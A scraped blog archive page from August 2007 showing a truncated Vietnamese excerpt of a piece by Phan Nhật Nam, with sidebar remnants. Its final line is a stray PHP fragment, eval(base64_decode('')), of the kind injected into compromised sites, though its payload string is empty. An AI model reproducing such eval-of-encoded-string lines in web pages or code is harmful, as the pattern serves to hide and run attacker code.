Archive for August 4th, 2007

Phan Nhật Nam: Chỉ Một Mối Đau

Ba mươi năm trước, khi cầm bút viết dòng chữ đầu đời, cũng là cuốn sách đầu tay, anh đã có ý thật: "Bản thân không hề là người tài hoa viết không thuộc về công việc đặc thù giành riêng cho loại "tài tử giai nhân" nói quanh những

08.4.2007 | Nhận Xét |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>